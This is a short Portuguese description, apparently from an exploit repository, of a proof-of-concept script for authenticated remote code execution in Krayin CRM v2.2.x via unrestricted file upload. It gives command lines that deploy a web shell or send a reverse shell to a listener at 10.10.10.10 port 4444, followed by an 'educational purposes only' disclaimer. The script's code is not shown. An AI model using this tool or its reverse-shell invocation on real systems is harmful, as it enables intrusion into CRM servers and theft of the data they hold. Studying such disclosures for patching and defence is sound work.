
Exploit de prova de conceito para execução remota de código autenticada no Krayin CRM v2.2.x via upload de arquivo irrestrito, suportando payloads de web shell e reverse shell.
Script de PoC para vulnerabilidade crítica no Krayin CRM v2.2.x permitindo RCE autenticado via upload de arquivo sem restrições.
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123
# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444
Apenas para fins educacionais.